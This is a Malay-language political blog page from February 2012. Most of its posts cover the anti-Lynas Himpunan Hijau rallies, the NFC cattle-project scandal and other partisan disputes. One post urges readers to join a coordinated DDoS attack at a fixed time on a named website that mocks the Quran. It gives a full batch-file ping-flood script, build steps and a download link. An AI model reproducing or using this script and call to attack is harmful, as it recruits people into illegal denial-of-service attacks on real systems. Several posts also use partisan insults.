Ahad, 26 Februari 2012

Anak Sungai Derhaka

Anak Sungai Derhaka


Beruk Upahan UMNO mengganas di Himpunan Hijau Pulau Pinang (Gambar dan Video)

Posted: 26 Feb 2012 08:24 AM PST



Himpunan Hijau di Sudut Pidato, Padang Kota, Esplanade itu dicemari apabila kira-kira 50 orang, termasuk pemimpin tempatan dari Pemuda Umno dan kumpulan pendesak Melayu, PERKASA mengganggu acara yang dijalankan itu.








Ketika acara itu dimulakan pada jam 6 petang, kumpulan itu mula menjerit kepada orang ramai yang berhimpun secara aman itu dan memberi amaran kepada mereka bahawa isu Lynas itu bukan "isu Pulau Pinang" dengan melaungkan slogan "Hidup Umno", "Kami mahukan kebebasan" dan "Balik Kuantan (Kembali ke Kuantan)".

Kira-kira 500 penyokong Himpunan Hijau kemudian membalas dengan laungan "Hidup Rakyat".

Selepas 15 minit berlalu keadaan semakin tegang, namun tidak ada kelibat polis dilaporkan memantau keadaan.



Ketua Menteri Pulau Pinang Lim Guan Eng tiba kira-kira jam 6:30 petang dan berucap kepada hadirin bahawa Pakatan Rakyat berpendirian tegas bahawa tidak akan menyokong kilang penapisan nadir bumi bernilai RM700 juta yang dibina di Gebeng, dekat Kuantan itu kerana bahaya pencemaran bahan radioaktif.



Beliau juga menggesa rakyat yang hadir supaya tidak diperbodohkan dan digertak oleh kumpulan yang berkumpul berhampiran.





Apabila mendengar nasihat Lim itu, kumpulan berkenaan terus mencaci Lim dan melemparkan kata-kata kesat ke atas setiausaha agung DAP itu. Para hadirin kemudian bertindak dengan mem-boo mereka.







Berikutan itu, Lim mula meninggalkan pentas dan menyertai orang ramai tetapi kumpulan itu mula mengasak para hadirin sehingga mengakibatkan berlakunya pertengkaran.

Menurut orang saksi, seorang wartawan dan seorang jurugambar sebuah akhbar berbahasa Cina cedera didakwa dipukul dengan topi keledar.





Mereka dikenal-pasti sebagai wartawan dan jurugambar akhbar Kwong Wah Jit Poh iaitu Andrew Chew, 29, dan Lee Hong Chun, 25, masing-masing cedera di bahagian badan dan kepala.

Mereka kini dirawat di Hospital Pulau Pinang (HPP).

Pihak polis akhirnya tiba pada jam 7:15 malam dan menagarahkan orang ramai supaya bersurai.

Sementara itu, menurut laporan Benama, Ketua Polis Negeri Datuk Ayub Yaakob berkata penganjur langsung tidak memaklumkan kepada polis mengenai acara itu sehingga berlaku kekecohan.

"Memang tidak memerlukan permit tetapi sepatutnya penganjur memaklumkan atau berunding dengan pihak polis berhubung perhimpunan berkenaan supaya polis dapat bersiap sedia atau menempatkan anggota di kawasan berkenaan bagi mengelak sebarang perkara tidak diingini berlaku.

"Bila berlaku kekecohan, baru penganjur maklumkannya dan mereka juga cuba menyalahkan polis kerana lambat bertindak," katanya.













Scandal NFC: Dikaitkan dengan Pecah Amanah, NFCorp 'bingung' dan persoal motif polis

Posted: 26 Feb 2012 05:51 AM PST



SHAH ALAM - NFCorporation (NFCorp) melahirkan rasa terkejut dan "kebingungan" dengan kenyataan Pengarah Jabatan Siasatan Jenayah Komersial semalam bahawa pengarah-pengarah syarikat projek lembu daging itu akan disyorkan agar dikenakan tuduhan pecah amanah (CBT).


Dalam satu kenyataan dikeluarkan petang ini, NFCorp berkata, oleh kerana polis sendiri mengatakan siasatan masih dijalankan, kenyataan sedemikian adalah sesuatu yang bersifat "pramasa" untuk dikeluarkan.

"Kedua, nampaknya Pengarah Jenayah Komersial telah lupa bahawa syarikat-syarikat berkaitan NFCorp di mana dana disalurkan adalah anak-anak syarikat NFCorp," kata syarikat ini dalam kenyataan itu mengulas kenyaatan polis semalam.

Semalam, Pengarah Jabatan Siasatan Jenayah Komersial Bukit Aman, Datuk Syed Ismail Syed Azizan berkata, polis mencadangkan agar Peguam Negara mendakwa Pengerusi Eksekutif NFCorp, Datuk Dr Mohamed Salleh Ismail atas pertuduhan pecah amanah.

Dua lagi pengarah syarikat itu merupakan anak Mohamed Salleh.

Syed Ismail berkata, cadangan itu terkandung dalam kertas siasatan yang sedang disiapkan polis, setelah dikembalikan pihak Peguam Negara Selasa lepas bagi menyiasat beberapa perkara lain.

"Kita ada menyelitkan cadangan ini agar pihak Peguam Negara mengambil tindakan itu. Kertas siasatan ini akan dikembalikan dalam masa terdekat," katanya.

Isu Pusat Fidlot Kebangsaan (NFC), yang diterajui Mohamad Salleh, suami Menteri Pembangunan Wanita, Keluarga dan Masyarakat Datuk Seri Shahrizat Abdul Jalil, mula mendapat perhatian ramai selepas Laporan Ketua Audit Negara 2010 pada Oktober lalu menyatakan pusat itu gagal memenuhi matlamat penubuhannya.

Ia semakin panas selepas pembangkang mendakwa wujud penyelewengan terhadap peruntukan kerajaan berjumlah RM250 juta yang disalurkan kepada NFC.

NFC ialah projek 'Lembah Daging' di Gemas, Negeri Sembilan yang bertujuan meningkatkan pengeluaran daging tempatan serta mengurangkan pergantungan negara terhadap daging import.

"Ekoran laporan media bahawa Datuk Syed Ismail telah mengatakan bahawa siasatan polis ada menunjukkan wujudnya elemen-elemen CBT dan penipuan, NFCorp berpandangan bahawa kenyaatan itu dikeluarkan terlalu awal," katanya lagi, yang turut mengatakan bahawa syarikat itu telah diberi nasihat oleh peguam utama, Datuk Seri Shafee Abdullah.

NFCorp juga mempersoalkan ketelusan dan motif tindakan pihak polis mengeluarkan kenyataan sedemikian memandangkan ia tindakan tidak adil yang seolah-olah mengatasi keputusan yang bakal hendak dibuat oleh Peguam Negara.

"Apakah Pengarah Jenayah Komersial cuba untuk mengambil alih kuasa Peguam Negara, yang merupakan pihak tunggal di bawah perlembagaan yang boleh memutuskan sama ada wujud jenayah atau tidak bagi tujuan pendakwaan," kata NFCorp.

Dalam kenyataannya, NFCorp juga berkata, pihaknya ingin bertanya kepada polis sama ada pihak berkuasa itu telah memberi pertimbangan sewajarnya dalam menentukan wujud elemen-elemen tidak jujur, komponen utama dalam kes CBT dan penipuan.

"Dalam tempoh tiga bulan dan lebih, pengarah-pengarah dan pengurusan dan pekerja NFCorp telah memanjangkan kerjasama penuh kepada polis dan SPRM di mana pengarah-pengarahnya telah melalui sesi temu bual yang mendalam.

"NFCorp akan terus memanjangkan kerjasama bagi memastikan kebenaran muncul," katanya.


Sinar Harian

Surat Dr M kepada Israel didedah minggu depan?.. nak edit dulu ke?

Posted: 26 Feb 2012 05:12 AM PST



SEKINCHAN - Kerajaan akan mendedahkan isi kandungan perutusan surat antara bekas Perdana Menteri Tun Dr Mahathir Mohamad dan bekas Perdana Menteri Israel Ehud Barak awal minggu depan.


Perdana Menteri Datuk Seri Najib Tun Razak hari ini berkata beliau telah mengarahkan Wisma Putra untuk menyemak surat tersebut dan mendapati ia boleh disiarkan untuk umum.

"Wisma Putra telah memberi ulasan dan saya sendiri juga telah menyemak surat tersebut. Esok lusa, kita akan mengambil langkah untuk membenarkan surat itu diterbitkan secara terbuka, supaya rakyat faham tujuan Tun Dr Mahathir menulis surat itu untuk memperjuangkan nasib rakyat Palestin yang menuntut kepada satu negara Palestin yang berdaulat," katanya kepada pemberita di SJKC Yoke Kuan di sini.

Katanya, surat tersebut menunjukkan keprihatinan Dr Mahathir dalam proses kedamaian di Timur Tengah dan isi kandungannya juga menepati dasar kerajaan Malaysia dari dahulu hingga sekarang.

Beliau berkata isu surat itu telah dimanipulasikan oleh pihak pembangkang yang sengaja mahu membangkitkan rasa sangsi rakyat terhadap pendirian kerajaan dalam isu ini, tetapi yang sebenarnya mereka mahu mengalihkan perhatian rakyat terhadap isu ketua pembangkang Datuk Seri Anwar Ibrahim yang telah menyatakan sokongan terhadap Israel.


Sinar Harian

Bersamalah kita DDOS website 'Burn The Quran' ini.. (panduan disertakan)

Posted: 26 Feb 2012 02:48 AM PST



Bukan saja di alam nyata Al-Quran dibakar tetapi di alam Cyber juga begitu.. Website Burn the Quran ini telah diwujudkan khusus untuk membakar Al-Quran secara maya..


Apa yang dipaparkan di website itu ialah..

Each time this page is loaded a fresh, new copy of the Holy Koran is downloaded from one of several different sites. Pressing the Burn It! button will permanently delete ("burn") that copy of the Koran forever. After the current copy is burned you may then burn another copy.

Oleh itu selain dari mengadakan demo membantah dan mengutuk tindakan tentera US membakar Al-Quran baru-baru ini wajarlah kita bersama menjahanamkan portal yang jelas cukup menghina dan mengguris umat islam iaitu http://www.burn-the-koran.com/dengan cara serangan DDOS atau Distributed Denial of Service.

Pihak kami sedang bertungkus lumus untuk menghancurkan website ini dan sementara itu kami memerlukan bantuan anda untuk menyertai kami dalam jihad kecil ini. Untuk mereka yg tidak tahu disini saya turunkan cara paling mudah untuk serangan ini. iaitu membuat aplikasi DDOS (Distributed Denial of Service) dengan bantuan Batch File. Semoga usaha kita ini diberkati Allah S.W.T ...... TAKBIR !!

Serangan akan diseragamkan pada malam ini 26/2/2012 tepat pukul 10 malam sehingga website tu down !

Sila ikut Step By Step :


.::[Cara Pembuatan]::.

1) Buka notepad

2) Copy Code yg di bold dibawah ini

@echo off

mode 67,16

title DDOS Attack by d43n91n3

color 0a

cls

echo.

echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

echo DDOS With Batchfile

echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

echo.

set /p x=Server-Target:

echo.

echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

ping %x%

echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

@ping.exe 127.0.0.1 -n 5 -w 1000 > nul

goto Next

:Next

echo.

echo.

echo.

set /p m=ip Host:

echo.

set /p n=Packet Size:

echo.

:DDOS

color 0c

echo Attacking Server %m%

ping %m% -i %n% -t >nul

goto DDOS


3) Paste code tersebut kedalam notepad anda

4) Save as file tersebut pilih all file.

5) tukarkan nama file dan extension file tersebut kepada "DDOS.bat"

6) Siap cara pembuatan


Atau download saja disini click

.::Cara Guna::.

Sila lihat di SINI

Himpunan Hijau 2.0 : Apa yang Blogger Pro UMNO laporkan?

Posted: 26 Feb 2012 12:11 AM PST



Ketika kebanyakkan portal berita on-line menyiarkan laporan yang disokong dengan video akan ribuan yang hadir dalam Himpunan Hijau 2.0 yang telah berlangsung di Kuantan, Pahang ada juga Blogger Pro UMNO yang mahu menafikannya.


Gambar di atas disiarkan oleh sebuah Blog Pro UMNO, tujuannya tidak lain dan tidak bukan ialah bagi membuktikan bahawa Himpunan tersebut tidak mendapat sambutan biarpun hakikatnya adalah sebaliknya..

Selain itu.. bagi yang biasa dengan fotografi.. dari berapa ketinggiankah gambar di atas dan dibawah ini di rakam? dan adakah disekitar padang tersebut mempunyai bangunan setinggi sudut gambar ini di rakam?

Cepatnya dia dapat gambar ni ya...



Dari entry yang disiarkannya adalah jelas menunjukkan bahawa beliau cuba mahu memperbodohkan pembaca Blognya tetapi dalam masa yang sama beliau telah menyerlahkan sifat bodoh yang ada dalam dirinya.

Bodoh kerana tidak dapat memikirkan bahawa jika pembaca Blognya boleh membaca apa yang disiarkannya, pembaca tersebut sudah pasti boleh membaca apa yang disiarkan oleh portal-portal berita on-line..

Bacalah apa yang Blogger mangsa pembodohan pemimpin UMNO ni laporkan….

Photobucket
Photobucket
Photobucket
Photobucket

Himpunan Hijau berakhir, kerajaan diberi 24 jam batal projek Lynas (Video Inside)

Posted: 25 Feb 2012 10:54 PM PST



KUANTAN - Himpunan Hijau 2.0 yang diadakan di sini hari ini berakhir jam 11.30 pagi tadi dengan penganjur memberi masa 24 jam kepada kerajaan agar mengumumkan pendirian tidak akan meneruskan projek nadir bumi Lyans.


Jika kerajaan masih dengan pendirian mahu membenarkan operasi loji itu, penganjur memberi amaran akan mengadakan Himpuanan Hijau 3.0 dalam waktu terdekat.

Dalam pada itu, Suhakam pula menyatakan pihaknya berpuas hati dengan kerjasama polis meluluskan lokasi perhimpunan dan mengawal lalu lintas bagi melancarkan perjalanan Himpunan Hijau.



Dengan kehadiran ribuan peserta Himpunan Hijau 2.0 di Kuantan pagi ini, pengerusi jawatakuasa pemandu Wong Tack menjanjikan jumlah yang lebih ramai jika kerajaan sekarang terus berdegil tidak memperdulikan bantahan dan rayuan rakyat itu.

"Kami memberi tempoh kepada kerajaan 24 jam untuk menutup loji berkenaan, jika tidak kami akan menganjurkan demonstrasi yang lebih besar.

"Tutup kilang Lynas, atau kami akan tumbangkan kerajaan, kamu buat keputusan," katanya sambil menggesa kerajaan menyelesaikan masalah berkenaan sebelum pilihan raya umum akan datang.



Bercakap dalam sidang media selepas perhimpunan itu, Wong berkata jika perhimpunan kali ketiga berlangsung, seluruh rakyat Malaysia akan turun menyertainya bagi membantah kehadiran loji tersebut.

Ditanya mengapa pihaknya tidak mengambil jalan lain antaranya berdialog dengan kerajaan untuk menyelesaikan masalah ini, Wong menegaskan tindakan itu "tidak relevan".

"Kita sudah tunggu satu tahun untuk dialog. Jangan buang masa lagi. Cukuplah," katanya.

Beliau juga mempersoalkan mengapa kerajaan menerima projek itu beroperasi di negara ini, bahkan sisa bahan radioaktif tersebut akan ditanam di sini.

"Mungkin boleh menjadi kerajaan untuk beberapa tahun, tetapi (sisa) itu kekal dalam tempoh yang lama.

"Kerajaan boleh buat janji kosong, yang menanggung derita adalah rakyat," katanya - Malaysiakini






Mamat ni pun kecewa juga...

Scandal NFC : NFC dah jadi mangsa DAP pula ke?

Posted: 25 Feb 2012 08:36 PM PST



Antara alasan paling bodoh yang aku temui dalam scandal NFC ini, ialah alasan yang diberikan oleh pihak pengurusan NFC iaitu Pengarah Eksekutif NFC, Wan Shahinur Izran Salleh.


Dimana belia telah menyalahkan PKR kerana kononnya memutar belit fakta yang ada, selain itu beliau juga mendakwa NFC telah menjadi mangsa PKR - baca di ( SINI )

PKR dipersalahkan mungkin kerana pendedahan sering dilakukan oleh Pengarah Strategi PKR, Rafizi Ramli, kini pendedahan diteruskan pula oleh Ketua Publisiti DAP Tony Pua..

Adakah kini NFC menjadi mangsa DAP pula??

********************************************

Putrajaya perlu bekukan semua aset NFC termasuk di luar negara, kata Tony Pua

KUALA LUMPUR, 26 Feb — Ketua Publisiti DAP Tony Pua menggesa Putrajaya dengan segera membekukan semua aset Pusat Fidlot Corporation (NFCorp) sama ada di Malaysia atau luar negara.

Menurut Pua, tindakan itu dapat memastikan dana awam yang belum digunakan tidak disalahguna untuk kepentingan peribadi.

Tambah beliau (gambar), ia juga sebagai langkah susulan selepas semalam polis mengesyorkan kepada Peguam Negara supaya pengarah NFCorp didakwa atas kesalahan pecah amanah.

"NFC telah melanggar syarat-syarat perjanjian dengan menggunakan dana untuk tujuan lain. Ia terbukti bahawa pengarah-pengarah NFC menggunakan wang dari dana pinjaman itu untuk membeli hartanah di Kuala Lumpur dan Singapura.

"Ekoran pengesahan polis bahawa pindahan aset secara tidak sah merupakan jenayah pecah amanah, justeru kami menyeru polis membekukan pindahan atau jualan aset yang dimiliki Pusat Fidlot Nasional (NFC) dan lembaga pengarah NFCorp," kata Pua dalam satu kenyataan.

Jelas Ahli Parlimen Petaling Jaya Utara ini, pembekuan aset itu perlu dilakukan serta-merta memandangkan kesemua aset itu terletak di bawah nama pengarah NFCorp.

"Kebanyakan aset sama ada secara langsung atau tidak secara langsung dibuat di bawah nama pengarah NFC. Ini termasuk aset di Malaysia dan Singapura, serta syarikat-syarikat di Singapura seperti MeatWorks (Singapura) Pte Ltd.

"Untuk memastikan aset-aset ini tidak dihapuskan melalui perbelanjaan daripada pinjaman mudah RM250 juta, polis mesti memulakan tindakan ke atas semua aset dan membekukan semua aset NFC," katanya.

Polis memohon Peguam Negara supaya pengarah NFCorp didakwa atas kesalahan pecah amanah selepas pemimpin pembangkang mendakwa sebahagian daripada RM250 juta pinjaman mudah kerajaan telah digunakan untuk tujuan lain.

"Kami mencadangkan Pejabat Peguam Negara supaya semua pengarah NFCorp didakwa atas kesalahan pecah amanah," kata Ketua Pengarah Jabatan Siasatan Jenayah Komersial (JSJK) Bukit Aman Datuk Syed Ismail Syed Azizan.

NFCorp, yang dimiliki oleh suami dan tiga anak Datuk Seri Shahrizat Abd Jalil, merupakan syarikat yang bertanggungjawab menguruskan NFC.

NFC mula menjadi topik hangat setelah syarikat itu tersenarai dalam Laporan Tahunan Ketua Audit Negara 2010.

Shahrizat tetap menegaskan dirinya tidak mempunyai sebarang kaitan dengan projek berkenaan.

Sejak itu, PKR mula membuat pendedahan berterusan terhadap skandal NFC, termasuk tuduhan penyalahgunaan dana kerajaan jutaan ringgit untuk pembelian tanah, hartanah, dan perbelanjaan tidak berkaitan dengan projek ternakan lembu tersebut.

Namun demikian, baru-baru ini berhubung dakwaan pembelian dua unit kondominium bernilai RM34 juta di Singapura, di kawasan Marina Bay Suites, anak Shahrizat, Wan Shahinur Izmir menjelaskan syarikat berkenaan telah membuat keputusan untuk menggunakan wang tersebut dalam pelaburan hartanah ketika berehat daripada aktiviti perniagaan.

Penangguhan berkenaan jelas Wan Shahinur Izmir, adalah disebabkan siasatan yang dijalankan kerajaan ke atas NFCorp.


The Malaysian Insider

Hampir 10 ribu hadir, laman web Lynas digodam

Posted: 25 Feb 2012 07:03 PM PST



Himpunan Hijau 2.0 yang dijadualkan di padang MPK4 bidang sepanjang Jalan Tanah Putih menunju ke bandar Kuantan bermula pada jam 10 pagi ini.


Perhimpunan itu sebagai membantah tindakan Lynas Advanced Material Plant (Lamp) di Gebeng yang mahu membina sebuah loji pemprosesan nadir bumi yang berharga RM700 juta. Syarikat berkenaan awal bulan ini mendapat lesen operasi sementara dan kelulusan daripada Lembaga Pelesenan Tenaga Atom (AELB) untuk memulakan operasi mereka.

Penganjur perhimpunan itu malam tadi, membuat pengumuman mengejutkan pada tengah malam tadi di Facebook dengan mengumumkan bahawa mereka akan berkumpul di padang MPK1 di sepanjang Jalan Mahkota pada jam 9.30 pagi.

Menurut mereka, tindakan berkumpul di padang itu yang terletak kira-kira 1.8km dari padang MPK4 bertujuan "mengelakkan kesesakan lalu lintas".



Dari padang MPK1 mereka akan berarak ke padang MPK4. Padang MPK1 sebelum ini menjadi pilihan penganjur, namun secara tiba-tiba pada Khamis lalu, pihak berkuasa tempatan -
Majlis Perbandaran Kuantan (MPK) - mula mendirikan pagar dengan alasan untuk "kerja-kerja menaik taraf".

Namun setelah berunding dengan polis pada Jumaat lalu, akhirnya pihak berkuasa bersetuju membenarkan perhimpunan diteruskan dan padang MPK4 diberikan kepada orang ramai yang mahu membuat bantahan itu.

Laporan dari Malaysiakini


10.40am
Anwar Ibrahim sampai bersama-sama, Wan Azizah, Nurul Izzah dan Shamsul Iskandar di Pdg MPK 4.

10.30am:
Semakan pada laman web Lynas Corporation mendapati ia telah digodam.

Penggodam yang menamakan dirinya HackerXL menggantikan laman itu dengan satu lagi laman bertajuk "Hentikan Lynas, Selamatkan Malaysia. Jangan jahanamkan negara saya".

himpunan hijau 2 260212 crowd at 10am 0210.20am: Pemimpin veteran DAP Lim Kit Siang tiba dan beliau diberi tepukan gemuruh oleh hadirin.

10.17am: Kumpulan alam sekitar lain juga menggunakan Himpunan Hijau 2.0 sebagai gelanggang menyatakan bantahan mereka.

Antaranya aktivis dari Bukit Koman, Raub menceritakan kepada orang ramai berhubung perjuangan mereka terhadap aktiviti perlombongan emas yang menggunakan bahan kimia beracun cyanide.

Mereka berharap pihak berkuasa akan sedar bahawa nyawa lebih penting daripada keuntungan dan wang, semata-mata.

"Kita tidak janya mahu 1Malaysia, kita juga mahukan 1Malaysia yang sihat," kata seorang wakilnya sambil diberikan tepukan gemuruh.

NONE10.15am: Beberapa pemimpin NGO dan Pakatan Rakyat pula dibawa ke pentas. Antara mereka adalah ahli parlimen Kuantan Fuziah Salleh, yang dikenali antara pemimpin paling lantang menentang Lynas.

Jumlah hadirin di padang MPK4 semakin ramai dan dianggarkan tidak kurang 10,000 sedang berkumpul.

10:05am Gililiran Sasterawan Negara Datuk Samad Said atau lebih popular dengan panggilan Pak Samad untuk berucap.

Soalnya kepada hadirin "adakah kita mahu meninggalkan (loji) ini kepada anak cucu kita". Peserta perhimpunan terus menjwab "tidak!".

"Jadi apa patut kita lakukan?" soalnya dan hadirin sebulat suara menjerit: "Hancurkan Lynas".

Pak Samad kemudian menggesa rakyat bangkit mempertahankan alam sekitar ini daripada dicemari demi masa depan anak cucu semua.

himpunan hijau 2 260212 hishamuddin rais at stageKatanya, beliau sempat menulis empat buah puisi berhubung Himpunan Hijau dalam beberapa bulan ini.

"Saya ajak rakyat lawan, dan menyediakan 'rimba yang subur' untuk anak cucu kita," katanya.

10:02am Hishamuddin kemudian memberitahu orang ramai menurut anggaran pihak penganjur tidak kurang 10,000 sedang membanjiri padang itu.

NONEMemandangkan sistem pembesar suara yang tidak begitu, baik, beliau meminta orang ramai supaya duduk sambil tepuk tangan mengikut rentak gendang yang dipalu.

Beliau kemudiannya mengetuai orang ramai mendedangkan lagu 'Suara Rakyat' sambil diiringi paluan gendang Cina yang didatangkan khas.

10.00am: Solat hajat baru selesai. Aktivis sosial Hishammuddin Rais memberitahu para hadirin bahawa umat Islam, sebentar tadi berdoa memohon bantuan Allah supaya membantu rakyat bagi memastikan bumi ini tidak dijahanamkan oleh mereka yang korup.

himpunan hijau 2 260212 overview 930amKatanya lagi, mereka juga berdoa agar acara hari ini akan beroleh kejayaan.

Acara Himpunan Hijau 2.0 kini bermula secara rasmi.

Anggaran jumlah hadirin oleh polis menerusi Twitter: 4,000 - 5,000 setakat jam 9.45 pagi.

9.50am: Di lokasi satu lagi perhimpunan solodariti di Kuala Lumpur, kira-kira 200 orang yang berpakaian hijau berkumpul di Maju Junction.

9.45am Jumlah yang mula memasuki padang MPK4 semakin ramai dan setakat ini sukar bagi menganggarkan jumlah yang datang kerana ramai lagi kelihatan sedang berarak dalam beberapa kumpulan dari Kuantan menuju ke lokasi itu.

NONEKebanyakan yang hadir adalah penduduk sekitar termasuk keluarga mereka yang membawa anak-anak bagi membantah kilang memproses sisas radioaktif itu.

Berdasarkan jumlah orang ramai yang memenuhi lebih separuh daripada padang itu, dipercayai tidak kurang 5,000 orang yang hadir walaupun, acara secara rasmi belum lagi dimulakan.

9:26am: Pengerusi gabungan Hentikan Lynas Andansura Rabu yang diiringi kira-kira 500 ahli Badan Bertindak Anti Rare Earth Refinery (Badar) dan aktivis PAS juga mula tiba ke padang MPK4 sambil melaungkan "Kami mahu Lynas ditutup".

himpunan hijau 2 260212 in coming supportersAndansura adalah juga pengarah Badar. Katanya, hanya dengan menutup kilang lynas akan dapat menjamin kesihatan orang ramai.

Bersama beliau adalah naib presiden PAS Salehudin Ayub.Turut dikesan berada di lokasi ini adalah beberpa pemerhati daripada Suruhanjaya Hak Asasi Manusia (Suhakam) dan juga Majlis Peguam Malaysia.

9.20am: "Hentikan Lynas", "Hancur Lynas", "Undur Lynas" dan "Tindas Rakyat" adalah slogan popular yang terus dijerit oleh orang ramai yang berhimpun itu.

9:15am Semakin ramai ahli kumpulan hijau yang dianggarkan 2,000 orang kini bergerak ke padang MPK 4.Sepanjang perjalanan mereka dipantau oleh anggota polis.

NONEMeskipun tidak banyak membuat bising, namun kehadiran mereka disambut oleh penduduk yang membunyikan hon kereta, tanda sokongan terthadap Himpunan Hijau.

Antara pemimpin PKR yang dilihat berarak bersama orang ramai adalah N Surendren, Sivarasa Rasiah dan Lateefah Koya.

9.10am: Meskipin cuaca di Kuantan cerah dan panas, namun di Jalan Song, Kuching - satu lagi lokasi bagi perhimpunan itu, cuaca adalah sebaliknya. Hujan menyebabkan kira-kira 30 aktivis yang berkumpul bagi menunjukkan solidariti mereka, kini bayah kuyup.

Selain Kuantan, beberapa bandar juga mengadakan perhimpunan yang sama di beberapa lokasi di seluruh negara.

NONETindakan itu bagi menunjukkan bahawa rakyat di negara ini tidak bersetuju dengan keputusan kerajaan mengambil risiko membina kilang radioaktif berkenaan yang dikatakan mungkin mencemarkan alam sekitar dan membahayakan kesihatan orang ramai.

9:05 am Ketika ini kumpulan yang berbaju hijau sedang berjalan di Jalan Berserah menuju ke padang MPK 4.

Polis sebentar tadi memberi kerjasama kepada mereka menunggu rakan-rakan lain yang dari Kuantan dan kawasan sekitar untuk berkumpul di padang MPK 1 sebelum bergerak.

Kira-kira 20 anggota polis juga kelihatan mengawal sekitar padang MPK 1.

NONE9.00am: Jumlah hadirin di padang MPK4, kini dianggarkan 1,500 dengan kumpulan yang membawa belon berwarna hijau pula mengambil tempat.

Jumlah anggota polis yang hadir dianggarkan kira-kira 100 orang dengan dibantu dua ekor anjing. Helikopter yang berlegar-legar di ruang udara terus berbuat demikian.

8.58am: Suasana seolah-olah serperti pesta. Aktivis dari NGO mesra PKR, Jingga 13, mempersembahkan drama mempersendakan Menteri Besar Pahang Menteri Besar Datuk Seri Adnan Yaakob.

"Sebagai menteri besar berapa banyak awak akan beri saya untuk bina kilang?" soal seorang pelakon.

NONESeorang lagi yang berpakaian sebagai seorang jurutera dengan tertera perkataan "Lynas" pada bajunya menjawab: "RM700 juta!"

"Wow! Saya terima. Saya boleh ke London," jawab 'menteri besar' itu.

8:51am Ratusan peserta dari Hotel Megaview, kini berada berdekatan padang MPK1. Anggota polis kemudian meminta mereka terus ke padang MPK 4, tempat sepatutnya mereka berhimpun.

Mereka bergerak sambil terus menyanyikan lagu 'Suara Rakyat'.

8:45am Cuaca cerah di Kuantan, dengan semakin ramai yang datang. Dianggarkan tidak kurang 1,000 orang yang sedang berkumpul dan sebahagian besar mereka mencari teduh daripada bahang matahari kerana acara dijadualkan kira-kira sejam lagi.

NONEKumpulan aktivis Jingga 13 sedang memamlu kompang sambil menjeritkan slogan "Hentikan Lynas".

8:31am Bekas aktivis pelajar Hishamuddin Rais dilihat mengetuai orang ramai sambil menyanyikan lagu "Suara Rakyat" sebelum mereka berarak ke tempat berkumpul di padang MPK1.

Turut hadir adalah Sasterawan Negara Datuk A Samad Said dan juga beberapa anggota jawatankuasa pemandu BERSIH 2.0, termasuk Maria Chin dan Wong Chin Huat.

8:22am Sebuah helikopter polis kelihatan sedang berlegar-legar di bruang udara di kawasan sekitar, dipercayai bagi memantau kawasan sekitar.

himpunan hijau 2 260212 klscah bus 03Beberapa kumpulan NGO dan juga ahli parti-parti politik mula tiba.

Menurut seorang petugas unit amal PAS, PKR dan beberapa NGO itu akan berkumpul di Hotel Sentral di Kuantan manakala PAS pula di berdekatan pasaraya Giant, dan DAP akan berhimpun di berhampiran sebuah pasar.

Katanya, semua kumpulan itu, kemudiannya akan bergerak dan bertemu di padang MPK 4.

8:14am Kebanyakan yang hadir berpakaian serba hijau.

Turut hadir adalah penduduk Bukit Koman yang berkempen menentang perlombongan cyanidedi Raub.

8:10am Jumlah yang datang semakin ramai. Dianggarkan tidak kurang 300 mula berkumpul. Seorang peserta kelihatan membawa bendera Johor, manakala seorang lagi membawa sepanduk berbunyi: "Saya dari Klang, saya tentang kilang nadir bumi."

himpunan hijau 2 260212 stage early morning8:02am Pengerusi jawatankuasa pemandu Himpunan Hijau Wong Tack berkata orang ramai diminta berkumpul di padang MPK1 pada jam 9 pagi dan mereka akan berarak ke padang MPK4 dari situ.

Satu lagi, tempat berkumpul adalah di pasar Kuantan dan mereka juga akan berjalan menuju ke padang MPK1 sebelum ke padang MPK4.

Tuduhan ditangkap Khalwat : Penjelasan oleh Dr Badrulamin Baharom

Posted: 25 Feb 2012 10:08 AM PST



Saya menafikan dengan sekeras-kerasnya dakwaan media bahawa saya ditangkap khalwat oleh pegawai Jabatan Agama Islam Pahang (JAIP) di Kuantan.


Saya ke Kuantan untuk menghadiri Temurapat Pemimpin Parti Keadilan Rakyat pada 24 Februari sehingga 26 Februari 2012. Saya mengambil peranan aktif di dalam Temurapat ini.

Pada petang 24 Februari 2012, wanita tersebut telah menghubungi saya dengan nada cemas dan menyatakan hasrat beliau untuk melarikan diri daripada rumah kerana bimbangkan keselamatan diri beliau. Saya dengan tegas menasihatkan beliau untuk tidak berbuat demikian.

Walau bagaimanapun pada jam 2.00 pagi 25 Februari 2012, beliau telah menghubungi saya memaklumkan bahawa beliau sudah tiba di lokasi Temurapat Pemimpin Keadilan.

Saya telah mengenali pasangan suami isteri ini sejak lebih setahun lalu semasa wanita itu bersama keluarganya mengikuti rombongan umrah saya. Pasangan suami isteri ini sering berhubung dengan saya bagi mendapatkan nasihat mengenai masalah keluarga yang mereka hadapi termasuk kes keganasan rumah tangga. Di dalam usaha membantu pasangan ini, saya dan isteri pernah menziarahi keluarga ini di Rompin.

Di atas rasa tanggungjawab melihat wanita tersebut bersama anaknya di awal pagi, saya membantu beliau mendapatkan bilik penginapan. Pada jam 2.30 pagi suami wanita tersebut bersama lebih kurang 20 orang yang tidak dikenali menyerbu dan menyerang saya. Suami wanita tersebut kemudiannya telah membawa isteri dan anaknya pergi secara paksa.

Lelaki-lelaki bersikap ala samseng ini berhenti memukul saya apabila pihak keselamatan tiba dan menghalang mereka. Namun mereka masih tidak membenarkan saya keluar dari bilik. Hanya setelah 20 minit dikurung oleh samseng tersebut, pegawai Jabatan Agama Islam Pahang (JAIP) tiba dan menahan saya yang berseorangan di dalam bilik.

